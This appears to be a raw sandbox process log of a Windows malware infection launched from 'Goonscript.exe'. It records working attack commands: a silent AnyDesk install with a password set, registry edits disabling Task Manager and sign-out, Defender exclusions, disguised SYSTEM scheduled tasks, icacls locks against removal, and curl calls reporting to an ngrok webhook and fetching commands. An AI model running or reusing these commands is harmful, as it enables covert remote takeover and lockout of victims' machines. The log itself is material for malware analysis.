"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6612 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7012 /prefetch:8
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4987.tmp\4988.tmp\4989.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4C08.tmp\4C09.tmp\4C0A.bat C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4ec
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\86DE.tmp\86DF.tmp\86E0.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData\stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData\Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData\svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData\conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData\Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData\stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\B3EB.tmp\B3EC.bat C:\ProgramData\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"message\": \"Admin-786591712\"}" https://guiding-cheetah-vast.ngrok-free.app/webhook
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command
C:\Windows\system32\curl.exe
curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4236 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
